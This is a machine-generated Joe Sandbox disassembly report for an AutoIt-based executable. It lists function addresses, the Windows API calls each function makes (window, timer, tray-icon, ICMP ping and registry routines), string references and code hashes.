Part of subcall function 00E33624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E336E4

Strings

0, xrefs: 00E3355F
AutoIt v3, xrefs: 00E3357F
#, xrefs: 00E33566

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: af1fd6a5e0c0e6a9e278e4d2a8fb0260ab1c652a25ebc8ce1fd73a37eeb75a80
Instruction ID: 4f1eed2730556436e630b44002e3c143babaf32bfc6e055626c757655a5768fb
Opcode Fuzzy Hash: af1fd6a5e0c0e6a9e278e4d2a8fb0260ab1c652a25ebc8ce1fd73a37eeb75a80
Instruction Fuzzy Hash: CB212C70D00318AFDF509FA5EC59BA9BFB5FB48B50F00402AE604B62A0D7BA4545EFA0

Function 00EB0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00EB1019
inet_addr.WSOCK32(?), ref: 00EB1079
gethostbyname.WS2_32(?), ref: 00EB1085
IcmpCreateFile.IPHLPAPI ref: 00EB1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB1142
IcmpCloseHandle.IPHLPAPI(?), ref: 00EB1216
WSACleanup.WSOCK32 ref: 00EB121C

Strings

Ping, xrefs: 00EB10D3

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: b2b1bdcc210a15a036cf7a70db141e1fe92f5b0c10e41a59566f79a8f7ea743b
Instruction ID: 6a18a3b32abd99702919d9e63e3d1eed990e59606dab4435bb217f2d86241a46
Opcode Fuzzy Hash: b2b1bdcc210a15a036cf7a70db141e1fe92f5b0c10e41a59566f79a8f7ea743b
Instruction Fuzzy Hash: F491DF316092019FD320DF19C898F97BBE0BF48328F5495A9F569AB7A2C731ED45CB81

Function 00E3370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E33709,?,?), ref: 00E33777
KillTimer.USER32(?,00000001,?,?,?,?,?,00E33709,?,?), ref: 00E337A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E337C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E33709,?,?), ref: 00E337D1
CreatePopupMenu.USER32 ref: 00E337E5
PostQuitMessage.USER32(00000000), ref: 00E33806

Strings

TaskbarCreated, xrefs: 00E337CC

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 2d250da941bb5b20a311a419777b3e6c33f84d76ea4459e955fb65e36d47cbb3
Instruction ID: 3f3dcbf7409d86374a974ef16ddc59fdc9c13263c92e7aa2747ddda75d4bbb27
Opcode Fuzzy Hash: 2d250da941bb5b20a311a419777b3e6c33f84d76ea4459e955fb65e36d47cbb3
Instruction Fuzzy Hash: C941E3F1204248BADB642B3CDC4DFBA3EA9FB04305F14622BF505B51A1CA769B45F671

Function 00E690C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bccf4ce92ecd314a4601d9caa9634b9724cec55a51db4f15c23b938e1be8cc
Instruction ID: da15a0f2a1844184ac1abc37fd65096f90ccc431be4f6c440bc8a507d288043a
Opcode Fuzzy Hash: 34bccf4ce92ecd314a4601d9caa9634b9724cec55a51db4f15c23b938e1be8cc
Instruction Fuzzy Hash: 6DC10370984249AFCF11DFA8E884BADBBF9BF09354F146159E910BB393C7318942CB60

Function 00E335B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E335E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E33602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E33616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E3361F

Strings

edit, xrefs: 00E335FC
AutoIt v3, xrefs: 00E335D9, 00E335DE, 00E335DF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: bff0aa17a1034b57ff74d642969c56a09782305242267947282e879b9a82835c
Instruction ID: cec529b316e04a2673d71ee103af34877468aa6ba17f4291e555865188706813
Opcode Fuzzy Hash: bff0aa17a1034b57ff74d642969c56a09782305242267947282e879b9a82835c
Instruction Fuzzy Hash: 18F0DA716443987AEB7157176C0DF373EBDE7C6F50B00102EB904A7160D6BB1856EAB0

Function 00E361A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E75287

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E36299

Strings

Line %d: , xrefs: 00E75305
AutoIt - , xrefs: 00E3620D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 272d08ce0fb865864e55fa54402ebaad638e7c46d71618c71fa71a97a5a59073
Instruction ID: f66584de270a7a2f072342992383ab43f49b163f3c7512d4fb8d8a6e9998bca7
Opcode Fuzzy Hash: 272d08ce0fb865864e55fa54402ebaad638e7c46d71618c71fa71a97a5a59073
Instruction Fuzzy Hash: F141B571408304AAC750EB30DC49EDFBBECAF45314F00A92EF599A20A1EF759649C792

Function 00E68A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OV,00E6894C,?,00EF9CE8,0000000C,00E689AB,?,OV,?,00E7564F), ref: 00E68A84
GetLastError.KERNEL32 ref: 00E68A8E
__dosmaperr.LIBCMT ref: 00E68AB9

Strings

OV, xrefs: 00E68A30

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OV
API String ID: 2583163307-2262073888
Opcode ID: ecbd8622d87144562da8e858aa66532635aa7e0829598c8bbfa17144c931716b
Instruction ID: cd48859d383580cd5f4220b3f9852cac1a4f93c003133529c4f396c768d85310
Opcode Fuzzy Hash: ecbd8622d87144562da8e858aa66532635aa7e0829598c8bbfa17144c931716b
Instruction Fuzzy Hash: A8018E337851605AC66063B4BD45B7E27C55B917F8F25232BFD14BB1C2DF319C814180

Function 00E358CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E358EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E35910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E35932

Strings

Control Panel\Mouse, xrefs: 00E358ED

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0f168b642142caedf028aa1f426e9b7fd97fde36e4f632ba680463129661e5d2
Instruction ID: f0c040a5c1f4bc4ddf704567e97302c3d160af489f905f058fa2d4c4b9c12c75
Opcode Fuzzy Hash: 0f168b642142caedf028aa1f426e9b7fd97fde36e4f632ba680463129661e5d2
Instruction Fuzzy Hash: 9C115AB6510618FFDB218F69CC89EEEBBB9EF40764F105469F811E7210E2329E45D760

Function 00E3F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00E848C6

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 204e12612f4b87c9e9216d081fd3b85bb8dc251dde952b2a7bbfadb9b9cb7bf5
Instruction ID: 5904ae7f6393b99739c2320fa5c92ea0086e8292c1fbeeafee73954fdfce3deb
Opcode Fuzzy Hash: 204e12612f4b87c9e9216d081fd3b85bb8dc251dde952b2a7bbfadb9b9cb7bf5
Instruction Fuzzy Hash: 5EC27871E006058FCB24DF98C884AADBBF1FF09314F24956AE909BB3A1D775AD41CB91

Function 00E42B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00E43006

Strings

CALL, xrefs: 00E42FD6
bn, xrefs: 00E42B36, 00E42E8D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bn
API String ID: 1385522511-1920074456
Opcode ID: 8c4da2f8cc5b889291559f9af5125ea8ed33ab9a85ffc384992cc8dd24167a84
Instruction ID: 836f3f53e122cd032dfe1617ae13632f4c980eb1c80095fb866b6b5d7c293136
Opcode Fuzzy Hash: 8c4da2f8cc5b889291559f9af5125ea8ed33ab9a85ffc384992cc8dd24167a84
Instruction Fuzzy Hash: 5F22BD706082019FC714DF24D880B6AFBF1BF89314F64695DF99AAB3A2D731E945CB42

Function 00E40340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00E415F2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 8be399aaa315e44a3d6bd516cf5f116b137dbf7a53c782bccefc257e20a11780
Instruction ID: 8c347867e502e2fda285f168d0a85f0b4f0052b9fbd258da1fdaff490135fcb0
Opcode Fuzzy Hash: 8be399aaa315e44a3d6bd516cf5f116b137dbf7a53c782bccefc257e20a11780
Instruction Fuzzy Hash: CAB29C74A08301CFCB24DF14E480A2AB7E1BF99304F14596DFA8AAB351D771ED45DB92

Function 00E33A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00E7413B

Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871

Part of subcall function 00E33A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E33A76

Strings

`u, xrefs: 00E74134
X, xrefs: 00E74109

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u
API String ID: 779396738-2693526198
Opcode ID: 2b02cff1d7b55ebc63fb869369e84e05a2fe6b78fc75625567249cafa77f01ce
Instruction ID: b342904c96abe18f6003738a43115cb7b98d42c5bd22335702aeb2076f3a81ea
Opcode Fuzzy Hash: 2b02cff1d7b55ebc63fb869369e84e05a2fe6b78fc75625567249cafa77f01ce
Instruction Fuzzy Hash: EC215171A0425C9BDB019FA8C809BEE7FF8AF49314F009059E545B7281DBB59A89CFA1

Function 00E5014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00E509D8

Part of subcall function 00E53614: RaiseException.KERNEL32(?,?,?,00E509FA,?,00000000,?,?,?,?,?,?,00E509FA,00000000,00EF9758,00000000), ref: 00E53674

__CxxThrowException@8.LIBVCRUNTIME ref: 00E509F5

Strings

Unknown exception, xrefs: 00E50A02

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 5b2da3c4d5492ebc64d83443aa35fed9a9dd403757718736eb56a0898753291b
Instruction ID: 6e1efb37fb7809a01c73dbab8c305f71f7033afde4cdf02bcc5353e9d1d4ac30
Opcode Fuzzy Hash: 5b2da3c4d5492ebc64d83443aa35fed9a9dd403757718736eb56a0898753291b
Instruction Fuzzy Hash: D1F0283480070C778B00BAB4DC169AE77BC5E40355B606825FD14B65E3FB70E61DC6C0

Function 00EB89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EB8D52
TerminateProcess.KERNEL32(00000000), ref: 00EB8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00EB8F3A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: e795016de8fcbde6bb3a32c34682136748bbb942e399acd9578ed89862a3bc21
Instruction ID: 6d79704ee61b941bf0efbbebb31b203dc47c539978c455d3c3df6cf680b99673
Opcode Fuzzy Hash: e795016de8fcbde6bb3a32c34682136748bbb942e399acd9578ed89862a3bc21
Instruction Fuzzy Hash: 28127C71A083019FC714CF28C584BAABBE5FF84318F14995DE889AB352DB31E945CF92

Function 00E32793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E332AF
Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E332B7
Part of subcall function 00E3327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E332C2
Part of subcall function 00E3327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E332CD
Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E332D5
Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E332DD

Part of subcall function 00E33205: RegisterWindowMessageW.USER32(00000004,?,00E32964), ref: 00E3325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E32A0A
OleInitialize.OLE32 ref: 00E32A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00E73A0D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: dbc5d7f08a3dbc5a20b87d56747a701cd5029ccd138f3753b93757379e51676e
Instruction ID: 9c85b881b6ed6994b86e789851e7f1ff51d117fa1c9a6a6cfc63db4b585abd63
Opcode Fuzzy Hash: dbc5d7f08a3dbc5a20b87d56747a701cd5029ccd138f3753b93757379e51676e
Instruction Fuzzy Hash: E97191B89052088FC7C8DF79AD6D6257AE0BB88304758912ED409E73B2EB714545FF78

Function 00E4FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E36299

KillTimer.USER32(?,00000001,?,?), ref: 00E4FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E4FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E8FE33

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 959ff1d5b5b5ac7b157c506c83fe098bf76e4d7ad412e4a176fe0c89159684e9
Instruction ID: 957021b32334dcb98a68948072243637d6e45cd695881bb1bd1b1d85205ca05b
Opcode Fuzzy Hash: 959ff1d5b5b5ac7b157c506c83fe098bf76e4d7ad412e4a176fe0c89159684e9
Instruction Fuzzy Hash: 1B31C571904344AFEB32DF24C855BE7BBECAB02708F0014AEE69D67242C7745A85CB51

Function 00E6970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00E697BA,FF8BC369,00000000,00000002,00000000), ref: 00E69744
GetLastError.KERNEL32(?,00E697BA,FF8BC369,00000000,00000002,00000000,?,00E65ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00E56F41), ref: 00E6974E
__dosmaperr.LIBCMT ref: 00E69755

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: cc2331767f2c8e1184e50a6a6454516e81b2bc3aab11250722aba524d0654ed0
Instruction ID: 419059bc6a166744ed2239525e89cd829f5b45a5de62007b6bdfbfcf194487ef
